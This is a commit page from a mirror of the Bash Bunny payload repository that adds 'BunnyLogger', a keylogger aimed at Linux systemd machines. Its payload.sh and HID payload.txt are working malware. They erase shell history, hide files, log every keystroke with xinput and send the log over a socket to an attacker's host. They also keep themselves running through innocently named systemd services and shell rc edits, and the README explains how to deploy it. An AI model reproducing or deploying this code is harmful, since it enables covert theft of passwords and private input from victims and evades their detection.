hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Uploaded BunnyLogger (#500)

pull/561/head
drapl0n tuxed0 2022-03-07 21:20:39 +05:30 committed by GitHub
parent db8fdc67f4
commit 2fdb38a3b4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
5 changed files with 192 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

62
payloads/library/credentials/BunnyLogger/README.md Normal file
View File

@ -0,0 +1,62 @@
## About:
* Title: BunnyLogger
* Description: Key logger which sends each and every key stroke of target remotely/locally.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Credentials
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, Storage
## BunnyLogger: BunnyLogger is a Key Logger which captures every key stroke of traget and send them to attacker.
### Features:
* Live keystroke capturing.
* Detailed key logs.
* Persistent
* Autostart payload on boot.
### Workflow:
* Encoding payload and injecting on target's system.
* Checks whether internet is connected to the target system.
* If internet is connected then it sends raw keystrokes to attacker.
* Attacker processes raw keystrokes.
### Changes to be made in payload.sh:
* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `11`.
* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `15`.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| payload.txt | /payload/switch1/ |
| payload.sh | /payload/ |
| xinput | /tools/ |
### Usage:
1. Encode payload.txt and inject into target's system.
2. Start netcat listner on attacking system:
* `nc -lvp <port number> > <log filename>` use this command to create new logfile with raw keystrokes.
* `nc -lvp <port number> >> <log filename>` use this command to append raw keystrokes to existing logfile.
3. Process raw keystrokes using BunnyLoggerDecoder utility:
```
./bunnyLoggerDecoder
bunnyLoggerDecoder is used to decode raw key strokes acquired by bunnyLogger.
Usage:
Decode captured log: [./bunnyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]
Options:
-f Specify Log file.
-m Select Mode(normal|informative)
-o Specify Output file.
-h For this banner.
```
#### Support me if you like my work:
* https://twitter.com/drapl0n

50
payloads/library/credentials/BunnyLogger/bunnyLoggerDecoder Normal file
View File

@ -0,0 +1,50 @@
usage () {
echo -e "BunnyLoggerDecoder is used to decode raw key strokes acquired by BunnyLogger.\n"
echo -e "Usage: \nDecode captured log:\t[./bunnyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]";
echo -e "\nOptions:"
echo -e "-f\tSpecify Log file."
echo -e "-m\tSelect Mode(normal|informative)"
echo -e "-o\tSpecify Output file."
echo -e "-h\tFor this banner."
}
while getopts o:m:f:h: flag
do
case "${flag}" in
o) output=$OPTARG ;;
m) mode=$OPTARG ;;
f) filename=$OPTARG ;;
h) help=$OPTARG ;;
*)
usage
exit 1
esac
done
if [ -z "$output" ] && [ -z "$filename" ]; then
usage
exit 1
fi
if [ -z "$filename" ]; then
echo -e "BunnyLoggerDecoder: Missing option \"-f\"(Log file not specified).\nUse \"-h\" for more information." >&2
exit 1
fi
if [ -z "$output" ]; then
echo -e "BunnyLoggerDecoder: Missing option \"-o\"(Output file not specified).\nUse \"-h\" for help." >&2
exit 1
fi
if [ -z "$mode" ]; then
echo -e "BunnyLoggerDecoder: Missing option \"-m\"(Mode not specified).\nUse \"-h\" for help." >&2
exit 1
fi
if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then
echo -e "BunnyLoggerDecoder: Invalid mode \"$mode\".\nUse \"-h\" for help." >&2
exit 1
fi
if [ "$mode" == "normal" ] ; then
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output
exit 1
fi
if [ "$mode" == "informative" ] ; then
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output
exit 1
fi

24
payloads/library/credentials/BunnyLogger/payload.sh Normal file
View File

@ -0,0 +1,24 @@
#!/bin/bash
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
mkdir /var/tmp/.system
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
cp -r $mntt/tools/xinput /var/tmp/.system/
echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
chmod +x /var/tmp/.system/sys
chmod +x /var/tmp/.system/xinput
echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
chmod +x /var/tmp/.system/systemBus
mkdir -p ~/.config/systemd/user
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
chmod +x /var/tmp/.system/reboot
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service
systemctl --user daemon-reload
systemctl --user enable --now systemBUS.service
systemctl --user start --now systemBUS.service
systemctl --user enable --now reboot.service
systemctl --user start --now reboot.service
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit

56
payloads/library/credentials/BunnyLogger/payload.txt Normal file
View File

@ -0,0 +1,56 @@
# Title: BunnyLogger
# Description: Key logger which sends each and every key stroke of target remotely/locally.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Credentials
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 2000
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

BIN
payloads/library/credentials/BunnyLogger/xinput Normal file
View File

Binary file not shown.